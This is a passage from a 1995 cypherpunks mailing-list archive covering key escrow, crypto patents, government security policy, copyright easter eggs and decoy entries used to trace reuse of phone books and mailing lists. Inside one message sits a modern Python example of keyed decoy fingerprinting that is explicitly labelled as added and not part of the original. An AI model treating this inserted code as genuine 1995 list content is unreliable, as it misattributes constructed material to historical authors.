results are obvious.)

Note also the emphasis on "throughout the private sector and government
communities" as leading to this protection of law enforcement and national
security interests...no mention of this being mainly for export
issues...the focus seems to be on domestic use of CKE, with the "law
enforcement" and "national security" needs "preserved." Sounds ominous to
me.

I've used "Tim's Really Flaky Commercial Key Escrow Service" as a
placeholder for the kind of truly voluntary DRCs many of us would insist
on. (Other examples: a computer on my LAN, the bit bucket, my neighbor, my
lawyer, my bank in Liechtenstein, etc. Some of these are actually what I
would want to use. I can imagine interesting situations wherein
attorney-client privilege blocks access to the keys.)

So, what's the story? Is Steve Walker of TIS supporting the kind of
completely voluntary CKE system that Carl Ellison has advocated? Or a
mandatory system?

(A third imaginable possibility is "a system which is so universally
popular that it becomes universally used"...unlikely in the extreme, as I
know of at least a few people who won't use it, and expect others to bypass
it when they learn what the Feds can do. But I expect that the advocates of
the mandatory option will cite this possibility, as a way of sugar-coating
the proposal. Then, if this option fails (to preserve the Government's
interests!), watch for registration of DRCs.)

I met Steve Walker once, at the CFP Conference, and he seemed genuinely
interested in selling to citizens a voluntary system. But his comments to
the Privacy Advisory Board seem to imply a CKE system that would not be
completely voluntary in the operation (licensing, registering, auditing) of
Data Recovery Centers.

If this is the case, then alternatives to the TIS system will likely gain
more adherents from folks like us.

>Mr. Walker said that TIS has filed for patent protection
>for its Software Key Escrow (Clipper equivalent) and CKE
>systems including the DRC and application software
>approaches.  TIS is prepared to license its CKE system
>and software applications technology to any software or
>hardware vendor under very favorable licensing terms.
>TIS is also prepared to license its DRC system and
>technology to qualified DRC operators and vendors under
>similarly favorable licensing terms.  (See Reference
>#13).

The TIS system may be patented, but it seems to me that the older ideas of
Shamir secret sharing are not. And even simpler schemes of sealing parts of
keys in several envelopes... (My point is that older ideas of using crypto
in conjunction with emergency recovery systems are still usable, and have
been talked about for many years, long before the TIS disclosures.)

I hope it doesn't come to this. I hope TIS releases or licenses on very
general terms, with no government control of the DRCs. If not, I predict
their system will be subject to derision, and worse.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P.J. Ponder" <ponder@wane-leon-mail.scri.fsu.edu>
Date: Sun, 10 Sep 95 20:43:52 PDT
To: cypherpunks@toad.com
Subject: GAK/weak crypto rationale?
Message-ID: <Pine.3.89.9509102345.F11334-0100000@wane3.scri.fsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



After reviewing the reports filed by our intrepid reporters in the field 
about the NIST meetings, I am left with a puzzling thought:  Why are the 
NSA and the FBI so very keen on GAK and weak crypto?  There was posted on 
this list some time back a statistic about the number of wiretaps and 
intercepts requested and authorized in the past year.  As I recall, the 
number was quite small - around 12K [?].  Someone had found this out 
through an FOIA request, perhaps, (my recollection of it is poor). It was 
not a large number, anyway.  I must conclude that the actual number of 
intercepts is much, much larger than they are saying, and that they must 
be getting what they perceive to be good intel from all this snooping.

Otherwise, why would the NSA and the FBI be so gung-ho on this, when 
everyone is telling them it is bad for US software business, abhorrent to 
privacy rights, unenforceable, and just plain bone-headed in these new 
international geodesic network times?

--
PJ
p.s. -thanks for the reports, well done. I think most of the list readers 
are very appreciative of the coverage provided on Crypto95 and NIST sham.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 10 Sep 95 15:52:51 PDT
To: na116512@anon.penet.fi
Subject: Re: not a flame please read and think about this
Message-ID: <20619.9509102252@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Anon writes:
> i know this is unpopular but i wish someone would respond to the
> points rather than flaming me.

Fair enough, try these...

> wei dai patents algorithms - for microsoft!!!!. that should
> fucking help us a lot. whos he gonna sue first?

Shame it got patented, one more patent.  Patents are a mess, ick!

> hey i think ill patent xor!!!! and give the patent to the nsa!!!

I was kind of wondering if it would be necessary to patent something
just to ensure someone else did patent *your* idea, if you came up
with one.

Or can you publish, and then say that's prior art, so no one else can
go patent your idea.

Otherwise it would be kind of cool for cpunks to be holding a few
patents themselves, allowing free use, just to stop some "hmm let's see
what we can patent this week", and "let's patent their work cos they
haven't yet" types stealing stuff, and disabling a whole section of
work.

Chaum's got lots of nice technology, but his patenting and $150k price
tag might not be doing him favours.  Unless he really does manage to
pull some big banks or something.  I reckon the netscape model is a
good one, give stuff away to the educational lot, sell things cheap,
have free demo versions, get the standard first before charging a
ransom.

Guess he knows what he's doing tho.  I hope so for the sake of the
future of anon ecash.  Be a shame if some of these lame things which
claim to be ecash but are really checks with full audit logs, or
credit card transactions in disguise become the de facto standard.

Problem is no one stands much of a chance unless a radically new
method of ecash can be had, he has his patents cover blind sigs?  I
guess they don't cover blind sigs in general because Brands has
applied for patents on his improved blinding techniques.

> according to sci.crypt matt blaze can prove that clipper has no back
> door. right. that sure helps us. david sternlights new hero.

That interpretation was argued.  But it's interesting anyway, if a
MKCS is equivalent to a PK, and PKs are computationally expensive, and
clipper chips are cheap, well hey maybe that's what it does mean, and
they wouldn't want to have a weak backdoor in the sense of a weak
algorithm, as it may come to light some day, similarly eventually the
thing would surely get reverse-engineered, they wouldn't want to be
caught out, I'd have thought.  They don't need that for a backdoor,
they've already got the front door - a copy of all the keys.

> pat farrel signs up with the nsa to make the key escrow rules easier
> for us morons to understand. hey thanks. maybe theyll give you a
> nicer room in the concentration kamp.

I found it real informative to have a first hand report of what was
going on.  I don't see anything wrong with going along to the meeting
just to throw your spanner in the works, sounds like the govt types
didn't have an easy time of it.

They're clearly asking for things which are unacceptable to industry,
and cpunks alike.

A lot of the stuff Pat wrote up about the NIST meeting sounded like
the majority of the attenders were trying to convert a government
request for GAK into a CKE discussion.  Would be a cool switch.

> a whole shitload of socalled cypherpunks jumping over each other to
> help and defend him.

Well you did ask :-)

> brian davis tries to convince us that key escrow isnt so bad (who
> signs your paycheck davie?????)

Not sure that there was a motive attached (I could be wrong?), seemed
like a provoking question to me.  Got some interesting replies.

> that guy from rand corp tells us words of wisdom from robert morris
> the nsa guy as if we should write them down and pray three times a day
> to them.

I always kind of like to hear what ex-NSA types are reported as
saying, it's quite fun because you never know if they are still on the
payroll and feeding you a story for ulterior motives, or if they are
making a statement which they think is to their advantage to scare
you, or if they really are ex-NSA and are just saying what they can,
being helpful, without getting in hot water with the secrecy stuff
they have to agree to.

> carl ellison designs key escrow for tis and acts like hes one of us.

Designs CKE, CKE is fine by me, it's voluntary, and just the software
equivalent of having a spare key for your own use.

GAK is the evil one.

> bruce schneier is copyrighting crypt programs and
> threatening to sue people who use it.

Let's tackle one thing at a time ok?

Lots of folks would agree patents are bad news, at least the state of
them in the US with idiots patenting XORed cursors, etc.

Close to unanimous on GAK being evil incarnate.

Copyrights, well GPL, ILF, RMS says programs should be free.

Indeed long term copyrights look like endangered species, if crypto
anarchy has its say.

But it's a tricky one because a lot of people make their money writing
applications, and they don't want to vote themselves out of a job.

If crypto anarchy long term proves copyrights to be outmoded, well
the market will change.

> even phil zimmermann is selling the rights to pgp. what about all the
> people who contributed code (like me). not a dime for us because
> phil is famous and you're not allowed to say anything bad about
> him. sorry i forgot phil is god.  no one dares to complain. ask phil
> about me and when i asked about sharing profits from the code i
> contributed. also about the deal with r.f...

Wouldn't be much to go around if all the contributors got a share,
there were lots of contributors.  He's the one taking the rap anyway,
and the guy who made it all possible.

> lets get back to being punks. 

Cpunks write code, so let's do it!

And lobby, and analyse govt policies, and educate about crypto, and
attend govt run white-washes (NIST etc) to register their protest.

> fuck these traitors

Nah.  Crypto anarchy and all that, it's an anarchy, you ain't going to
find 2 cpunks with exact identical view points on all topics.  Most of
the people you complained of to my understanding have done a lot of
work for the cpunk causes, as well as their implied copyright/patent
crimes.

> do crypto and fuck the nsa.

Sounds cool to me.

So what's the plan of action?  People have different ideas, but they're
all fighting for the same cause.  Down with GAK, being the #1 target
at the moment.  Privacy from governments, scaling down of hugely
bloated governments, malign cancerous growths that they are becoming
these days, freedom is what it's all about.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 15:20:25 PDT
To: cypherpunks@toad.com
Subject: Nice Guys
Message-ID: <199509102220.AAA25494@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



   NY Times, Sept. 10, 1995.

   The Decline of the Nice-Guy Quotient

   By Daniel Goleman


   Contrary to conventional wisdom, nice guys do finish first.
   The trouble is, nice guys are harder and harder to find.

   Amid the agonizing over standardized intelligence tests
   comes a new problem to worry about. Psychologists seeking
   a broader measure of intelligence, one that accounts for
   the personality traits that seem to predict success better
   than IQ alone, have discovered that a newly minted virtue
   they call "emotional intelligence" is declining as well.

   A recent study done at Bell Laboratories, the high-tech
   think tank near Princeton, N.J., found that the most valued
   and productive engineers -- at least among electrical
   engineers working in teams of up to 150 people -- were not
   those with the highest IQs, the highest academic
   credentials or the best scores on achievement tests.

   Instead, the stars were those whose congeniality put them
   at the heart of the informal communication networks that
   would spring up during times of crisis or innovation.

   When these likeable engineers hit a snag and E-mailed for
   help, they got an answer instantly; when others less gifted
   in interpersonal realms sent similar messages, they
   sometimes waited days or weeks for a reply.

   The standouts excelled in rapport, empathy, cooperation,
   persuasion and the ability to build consensus among people.

   The new term for these traits is emotional intelligence,
   which, in addition to the social graces, includes the
   ability to read one's own feelings, to control one's own
   impulses and anger, to calm oneself down and to maintain
   resolve and hope in the face of setbacks.

   To predict the success of a financial analyst or
   geophysicist, IQ is still crucial. But within a pool of
   high-IQ people, those with high emotional intelligence will
   have an extra competitive edge.

   Emotional intelligence, like self-knowledge and personal
   charisma, has long been seen as ineffable, more the stuff
   of poets and philosophers than psychometricians. And yet,
   despite all that, the measuring has begun.

   In the mid-1970s, and again in the late 1980s, Thomas
   Achenbach, a psychologist at the University of Vermont, had
   thousands of American children assessed by their parents
   and teachers on a behavioral checklist. He found that over
   the course of that decade and a half, America's children,
   on average, had become more anxious and depressed, more
   impulsive and mean, more demanding and disobedient, more
   hot-tempered and aggressive -- and not just in beleaguered
   urban neighborhoods.

   The study found growing emotional deficits even among the
   children of the wealthiest suburbs. Although the scores
   were worst for the poorest children, the rate of decline
   was the same for all, privileged and impoverished alike.

   Apparently, students continue to be receptive even into
   their teen years. Neuroscientists have found that the
   centers in the prefrontal lobes that control emotional
   impulse are among the last parts of the brain to reach full
   maturity, sometime in mid- to late adolescence.

   Now, at last, from the emotional literacy front there is
   some promising news: Children in the courses show marked
   improvements in the ability to control their impulses, show
   empathy, cooperate with others, manage anger and anxiety,
   focus on a task, pursue goals and resolve conflicts.
   Delinquency, fights and drug use drop.

   And there is an added bonus: achievement test scores rise
   too.

------










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Sep 95 00:35:31 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Big machine ordered from Intel
Message-ID: <199509110735.AAA01275@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:40 AM 9/8/95 -0700, Patrick wrote:
>How much you want to bet that a first copy goes to virginia?
>> NY Times, Sept 8, 1995.
>> Intel Wins Contract to Develop World's Fastest
>> Supercomputer
>> San Francisco, Sept. 7 -- The Intel Corporation said
>> today that it had won a contract from the Department of
>> Energy to develop what it called the world's fastest
>> supercomputer.
...
>> The machine, to be built at an estimated cost of $45
>> million, would use 9,000 of Intel's forthcoming P6
>> microprocessors linked in a configuration known as

Not likely.  It's the kind of machine Sandia _would_ use, especially
since they seem to be getting good support for nuclear-related
boondoggles even after the demise of the Cold War, and it's
also the kind of thing they could use for commercial applications
if they lose their nuclear funding, or use to say "But we _need_
to keep funding this program, we haven't yet gotten our money's
worth out of this big expensive computer", etc.
Also, the cost is roughly $5K/processor, which is probably more
than you'd need to build an MPP key-cracker, which doesn't need
as much interaction between processors.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Mon, 11 Sep 95 02:11:24 PDT
To: cypherpunks@toad.com
Subject: question about reputa
In-Reply-To: <8B0D52F.000504EADD.uuout@the-matrix.com>
Message-ID: <8B0E027.000504EC28.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



F|Adam Shostack writes:
 |# Good question, but a quick modification allows for effective
 |# bootstrapping.  If I want to start consulting for Amalgamated
 |# Consolidated, I can offer them a 10 free questions deal to bootstrap
 |# things with.  Mallet can only cheat if my offer was broadcast.
F|Wei Dai writes:
 |> This scheme doesn't quite work.  (Let's call Amalgamated Bob, to keep
 |> names short.)  Bob can create a new, unlinkable pseudonym and give the same
 |> offer to Carol under the new pseudonym.  Then, Bob acts as Mallet and
 |> passes messages back and forth between Alice and Carol.
F|If all Alice's prospective customers are also resellers on the side, then I
 |agree that she has a problem. But how realistic is a market scenario in which
 |a new supplier cannot positively identify some legitimate end consumers of a
 |product or service ?  (I'm ignoring cases in which the market for the
 |product or service is only just being forged.)  This strikes me as rather
 |implausible, although I don't claim to have devoted a great deal of thought
 |to it.

        Hey, Wei, you overlooked something rather simple: suppose
        Alice wasn't any good?  Or suppose she was good, in general,
        but came up wrong at a bad time?  Whereas she might have
        corrected it in time if it had been her client and she had
        direct access, Mallet gets hit broadside out of ignorance--
        and the resulting delay from the extra link in the chain
        could easily be enough to ruin him.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.
---
  SPEED 2.00 #2640  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Mon, 11 Sep 95 00:28:30 PDT
To: cypherpunks@toad.com
Subject: Re: Document Fingerprinting
In-Reply-To: <199509110443.WAA00476@wero.byu.edu>
Message-ID: <m0ss2Mm-00078PC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In servalan.mailinglist.cypherpunks you write:
>I seem to recall a lawsuit where somebody like Tandy was suing
>somebody else, claiming they copied the computer's rom code.

>As proof they pulled out the competitor's computer, pressed a
>certain key combination, and the Tandy copyright flashed up on
>the screen. As I also recall, they LOST the suit believe it or
>not...

Dunno about that one, but there was one where Tandy/Radio Shack was being
sued by the guy (Randy Cook) who originally wrote TRSDOS 2.1, claiming 
RS owed him royalties (which they weren't paying) because the current 
shipping TRSDOS for the Mod I at the time (v2.3) still had Randy's code.
RS claimed otherwise.  Randy Cook showed that if you held down two keys while
booting TRSDOS 2.3, (either the '2' and '4' keys, or '2' and '6', I forget
which), instead of going into the OS the machine would show a nice 
copyright screen, including "Copyright (C) Randy Cook".  Oops.  Tandy/RS had
to pay up.  (For those who still have a working Model I and a copy of TRSDOS
from that era, the message is located in one of the sectors on Track 0; it's
fairly easy to spot with a sector editor like SUPERZAP...)

There was also the famous Apple/Franklin case, where Apple showed that
Franklin's Apple II clones contained the original Apple II ROMs, right down
to the copyright notice.  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 10 Sep 95 23:30:38 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Internet commerce mtg, Denver
Message-ID: <v02130500ac78bfb2b964@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:00 9/9/95, Vladimir Z. Nuri wrote:
>the rep told me something interesting: he said that every
>Bell phone book is actually "seeded" with dummy names
>so they can detect copyright infringers. if you come out
>with a business directory, these Bells will just scan for
>the fake names that they have inserted into their own listings.
>if they find them, supposedly they can show them to a copyright
>judge and he will immediately close down your operation and
>fine you, almost no questions asked. I didn't know how much
>of this really happens (the legal stuff sounded questionable
>to me) but it is an interesting "real world" instance of
>copyright terrorism prevention that the "information liberation
>front" would have to contend with.

This is standard practice with (snailmail) mailing lists. When you buy a
one-time-use mailing list, there are always names in there to detect resale
or reuse of the list. There are people whose job it is to scan the junk
mail they get and report when they get mail to specifically encoded names
(which would indicate that the mailing list has been reused or merged with
another list without permission).

I see nothing wrong with doing something similar with Phone Books (and I
seem to remember reading that has been done in the past).
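
Added example, not part of the original message: the seeding practice described above, with each licensee's copy of a list carrying its own decoy entries derived from a keyed hash, so that a reused or merged list points back to the copy it came from. The owner key, licensee names, name pools and sample records are all constructed for illustration.

```python
"""Per-licensee decoy entries for a rented list (added illustration)."""
import hashlib
import hmac

# Constructed name pools; a real list owner would use plausible local names.
FIRST = ["Alma", "Boris", "Celia", "Dmitri", "Edna", "Felix", "Greta", "Hugo"]
LAST = ["Aldane", "Brisco", "Corvin", "Dunmore", "Ellery", "Farrow",
        "Galt", "Harlan"]

KEY = b"constructed-owner-key"          # constructed; kept secret by the owner
LICENSEES = ["mailer-A", "mailer-B", "mailer-C"]   # constructed
REAL = [                                 # constructed sample records
    "Ann Example, 12 Oak St",
    "Raj Sample, 4 Birch Ave",
    "Lee Placeholder, 90 Pine Rd",
    "Mia Specimen, 7 Cedar Ln",
]


def _norm(entry):
    """Case- and whitespace-insensitive form, so retyped lists still match."""
    return " ".join(entry.casefold().split())


def decoys_for(key, licensee, count=3):
    """Derive this licensee's decoys from HMAC(key, licensee:index).

    Nothing has to be stored: the owner regenerates the decoys on demand,
    and without the key a decoy looks like any other entry.
    """
    decoys = []
    for i in range(count):
        d = hmac.new(key, f"{licensee}:{i}".encode(), hashlib.sha256).digest()
        first = FIRST[d[0] % len(FIRST)]
        last = LAST[d[1] % len(LAST)]
        box = int.from_bytes(d[2:6], "big") % 900000 + 100000
        decoys.append(f"{first} {last}, PO Box {box}")
    return decoys


def issue_copy(key, licensee, real_entries, count=3):
    """Real entries plus this licensee's decoys, sorted so decoys are mixed in."""
    return sorted(list(real_entries) + decoys_for(key, licensee, count))


def attribute(key, licensees, suspect_entries, count=3, min_hits=2):
    """Map each licensee to the number of its decoys found in a suspect list.

    Licensees below min_hits are dropped, so one chance match is not
    treated as evidence.
    """
    seen = {_norm(e) for e in suspect_entries}
    hits = {}
    for lic in licensees:
        found = sum(1 for d in decoys_for(key, lic, count) if _norm(d) in seen)
        if found >= min_hits:
            hits[lic] = found
    return hits


def demo():
    """A third party's directory built from mailer-B's copy, partly cleaned."""
    copy_b = issue_copy(KEY, "mailer-B", REAL)
    dropped = decoys_for(KEY, "mailer-B")[0]      # one decoy got deduplicated
    suspect = [e.upper() for e in copy_b if e != dropped]
    suspect.append("UNRELATED PERSON, 1 ELM ST")  # merged from another source
    return attribute(KEY, LICENSEES, suspect)


if __name__ == "__main__":
    print(demo())
```

Requiring more than one matching decoy is what turns a match into attribution: a single coincidental name proves little, several keyed decoys from one licensee's set do.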






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 20:23:55 PDT
To: cypherpunks@toad.com
Subject: Security Policy Documents
Message-ID: <199509110323.FAA01214@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



From: URL: http://csrc.ncsl.nist.gov/secplcy/


   Computer Security Resource Clearinghouse WWW Server
     
_________________________________________________________________

   
                           SECURITY POLICY DOCUMENTS
   
   These are computer security policy documents, primarily from the
   Department of Commerce, and the Office of Management and Budget.
   
   [?] Search Security Policy Documents
   
   a130app3.txt [62983 bytes]
           1995-03-29 Proposed Revision of OMB Circular No. A-130
          Appendix III
          
   doj-fg.zip [172668 bytes]
           1994-07-04 "Searching and Seizing Computers," U.S. Dept. of
          Justice, Federal Guidelines, July 1994 (zipped WordPerfect
          file)
          
   omba130.txt [80748 bytes]
           1994-06-06 Office Management and Budget
          
   cryptpol.wp [68689 bytes]
           1994-03-01 Cryptography: Policy and Technology Trends
          
   doc-copy.txt [4600 bytes]
           1993-11-23 Department of Commerce's Software Copyright Policy
          
   doc-poli.txt [86434 bytes]
           1993-11-23 Department of Commerce's Chapter 10 of the DOC IT
          Management Handbook, which contains the IT Security policies
          for the Dept.
          
   doc-man.txt [253689 bytes]
           1993-11-19 Department of Commerce beginning sections of the
          DOC "Information Technology Security Manual"
          
   a130.zip [26986 bytes]
           1992-06-08 Proposed Revision to OMB Circular A-130
          
   sec_2315.txt [2150 bytes]
           1992-02-27 Sect. 2315 of U.S. Code Title 10
          
   omb_a130.txt [97630 bytes]
           1992-02-27 OMB Circular A-130, "Management of Federal
          Information Resources"
          
   opm_plcy.txt [12951 bytes]
           1992-02-27 Computer Security Training Policy
          
   csa_87.txt [153493 bytes]
           1992-02-27 Computer Security Act of 1987
          
   rfc1244.txt [253471 bytes]
           1991-11-08 Very good summary of site security policies






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Mon, 11 Sep 95 05:50:46 PDT
To: cypherpunks@toad.com
Subject: Information Security and Privacy in Network Environments (fwd)
Message-ID: <199509111247.FAA00620@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    This was posted to another list today.  It purports to be fresh
    although the file at the Web site is dated 11 August.
    Hope this is not redundant.
> *
> U.S. CONGRESS
> OFFICE OF TECHNOLOGY ASSESSMENT
> Washington, DC  20510
> *
> 
> *
> ISSUE UPDATE ON INFORMATION SECURITY AND
> PRIVACY IN NETWORK ENVIRONMENTS
> *
> 
> The OTA background paper "Issue Update on Information
> Security and Privacy in Network Environments" is now
> available.  Ordering information and details about
> electronic access are at the end of this file.
> 
> INFORMATION SECURITY AND PRIVACY ISSUES IN NETWORK
> ENVIRONMENTS REQUIRE CONGRESSIONAL ATTENTION
> 
> Transition to a society that depends on electronic
> information and network connectivity brings new concerns for
> information security and effective protection of privacy.
> The new focus must be on safeguarding information as it is
> processed, stored, and transmitted, rather than on
> "document" security or "computer" security.  In the
> networked society, responsibility for information security
> is shifting to the end users.
> 
> In a background paper released today the congressional
> Office of Technology Assessment (OTA) finds an increasingly
> urgent need for timely congressional attention to these
> concerns.
> 
> OTA has updated, at the request of the Senate Committee on
> Governmental Affairs, some key issues identified in its 1994
> report on information security and privacy.  OTA found that
> recent and ongoing events are relevant to congressional
> consideration of national cryptography policy and
> government-wide guidance on safeguarding unclassified
> information in federal agencies.
> 
> OTA stresses the need for openness, oversight, and public
> accountability--given the broad public and business impacts
> of these policies--throughout the discussion of possible
> congressional actions.  In OTA's view, two key questions
> underlie consideration of policy options.  The first is: How
> will the nation develop and maintain the balance among
> traditional "national security" and law-enforcement
> objectives and other aspects of the public interest, such as
> economic vitality, civil liberties, and open government?
> The second is: What are the costs of government efforts to
> control cryptography and who will bear them?
> 
> None of the cost estimates will be easy to make, warns OTA.
> Ultimately, however, these costs are all borne by the
> public, whether in the form of taxes, product prices, or
> foregone economic opportunities and earnings.
> 
> OTA emphasizes that congressional oversight of government
> information security and privacy protection is of utmost
> importance in the present time of government reform and
> organizational streamlining.  The security of unclassified
> information has not been a top management priority;
> downsizing can incur additional information security and
> privacy risks.  Similarly, says OTA, management must ensure
> integration of safeguards when streamlining agency
> operations and modernizing information systems.
> 
> OTA finds momentum building for government-wide consolidation
> of information-security responsibilities.  Congress must
> resolve the overarching issue of where federal authority for
> safeguarding unclassified information in the civilian
> agencies should reside and, therefore, what needs
> to be done concerning the substance and implementation of
> the Computer Security Act of 1987, says OTA.  If Congress retains the
> general premise of the act--that responsibility for
> unclassified information security in the civilian agencies
> should not reside within the defense/intelligence
> community--then vigilant oversight and clear direction will
> be needed, says OTA.
> 
> Timely and continuing congressional oversight of
> cryptography policies is crucial, says OTA.  Cryptography, a
> fundamental safeguard, can preserve the confidentiality of
> messages and files, or provide "digital signatures" that
> will help speed the way to electronic commerce.  Non-
> governmental markets for cryptography-based safeguards have
> grown over the past two decades, but are still developing.
> Research is international; markets would be, says OTA,
> except for governmental restrictions, such as export
> controls that effectively create "domestic" and "export"
> market segments for strong encryption products.
> 
> Cryptography policies affect technological developments in
> the field, as well as the health and economic vitality of
> companies that produce or use products incorporating
> cryptography, and consequently, the vitality of the
> information technology industries and the everyday lives of
> most Americans.  But, business has strong and serious
> concerns that government interests, especially with respect
> to standards and export controls, could stifle commercial
> development and use of networks in the international arena.
> Given the broad public and business impacts, timely and
> continuing congressional oversight of these policies is
> crucial.
> 
> Strong encryption is increasingly portrayed as a threat to
> domestic security (public safety) and a barrier to law
> enforcement if it is readily available for use by terrorists
> or criminals.  Thus, export controls, intended to restrict
> the international availability of U.S. cryptography
> technology and products, are now being joined with domestic
> cryptography initiatives, like key-escrow encryption, that
> are intended to preserve U.S. law-enforcement and signals-
> intelligence capabilities.
> 
> Public and business concerns surrounding the Clinton
> Administration's escrowed-encryption initiative have not
> been resolved, notes OTA.  Many concerns focus on whether
> government-approved, key-escrow encryption will become
> mandatory for government agencies or the private sector, if
> non-escrowed encryption will be banned, and/or if  these
> actions could be taken without legislation. Although the
> Clinton Administration has stated that it has no plans to
> make escrowed encryption mandatory, or to ban other forms of
> encryption, OTA points out that, absent legislation, these
> intentions are not binding.  OTA concludes that escrowed-
> encryption initiatives warrant congressional attention
> because of the public funds that will be spent in deploying
> them, and also because negative public perceptions of the
> processes for developing and deploying encryption standards,
> and of the standards themselves, may erode public confidence
> and trust in government and the effectiveness of federal
> leadership in promoting responsible use of information
> safeguards.
> 
> OTA is a nonpartisan analytical agency that serves the U.S.
> Congress.  Its purpose is to aid Congress with the complex
> and often highly technical issues that increasingly affect
> our society.
> 
> ORDERING INFORMATION
> 
> For copies of the 142-page background paper "Issue Update on
> Information Security and Privacy in Network Environments"
> for congressional use, please call (202) 224-9241.  To order
> copies for noncongressional use, call (202) 512-0132 (GPO's
> main bookstore) or (202) 512-1800 and indicate stock number
> 052-003-01416-5.  Or send your check for $11.00 a copy or
> provide your VISA or MasterCard number and expiration date
> to Superintendent of Documents, P.O. Box 371954, Pittsburgh,
> PA 15250-7974, [FAX (202) 512-2250].  Free 8-page summaries
> are available electronically, and by calling (202) 224-8996.
> 
> ELECTRONIC ACCESS
> 
> Readers can access this background paper electronically
> through OTA Online via the following standard Internet
> tools:
> 
> WWW: http://www.ota.gov
> 
> FTP: otabbs.ota.gov; login as anonymous, password is your e-
> mail address; publications are in the /pub directory
> 
> Telnet: otabbs.ota.gov; login as public, password is public
> 
> Additional features of OTA Online are available through
> client software with a graphical user interface for
> Microsoft Windows.  This software is available free through
> the WWW home page or by contacting the OTA
> Telecommunications and Information Systems Office, (202)
> 228-6000, or email sysop@ota.gov  Direct questions or
> comments on Internet services by email to netsupport@ota.gov
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 11 Sep 95 02:48:08 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Digital Fingerprinting
In-Reply-To: <ac78f5a804021004b64e@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950911054528.26534B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 10 Sep 1995, Timothy C. May wrote:

> If a piece of mail addressed to me is found littering the highway, can I be
> convicted of littering? No, because the _provenance_ of that item of mail
> cannot be determined...it might have accidentally blown out of a trash
> truck delivering my mail to the dump, for example.

I'm afraid that they are busting people in New York for recycling 
violations when they find mail addressed to them mixed in with household 
garbage in public trash cans.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael S Baum <baum@world.std.com>
Date: Mon, 11 Sep 95 03:44:17 PDT
To: cypherpunks@toad.com
Subject: FYI
Message-ID: <Pine.3.89.9509110644.F5144-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 21:50:18 PDT
To: cypherpunks@toad.com
Subject: GAK Advisory Board
Message-ID: <199509110450.GAA02109@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


>From URL: http://csrc.ncsl.nist.gov/csspab/minutes.395


    Minutes of the March 22-23, 1995 Meeting of the
  Computer System Security and Privacy Advisory Board

Wednesday, March 22, 1995

Introduction

A quorum being present, the Chairman, Dr. Willis Ware,
called the meeting to order at 9:00 a.m. at the Holiday
Inn, Gaithersburg, Maryland.  Besides Dr. Ware, the
following Board members were present:  Charlie Baggett
Jr., Genevieve Burns, Cris Castro, Don Gangemi, Sandra
Lambert, Henry Philcox, Randy Sanovic, Stephen Trodden,
Steve Walker [TIS], and Bill Whitehurst [IBM].

[Snip long section on security assurance standards and
methods in US, Canada and UK.]

Update on X/Open Branding Project

Mr. Bill Whitehurst, IBM, gave a brief update of the
activities of the X/Open Branding Project.

Two major components exist within their branding concept:
(1) the ability to implement functionality based on a
minimum set of assurance functionality requirements
(MSFR), and (2) the confidence in the development process
for achieving the functionality.

He said that the workgroup meeting, hosted by Hewlett
Packard, was held early in March.  The group plans to
re-write their document to include some type of
evaluation process prior to the vendor product getting
branded.  X/Open plans to have a public review of the
changes this summer.


Vendor Perspective

Ms. Linda Vetter, Oracle Corporation, presented Oracle's
views of security assurance.  She discussed three types
of assurance issues: (1) government evaluation and
certification; (2) third party evaluation and
certification (government and business sponsored); and
(3) vendor claims.

Ms. Vetter explained Oracle's evaluation experience for
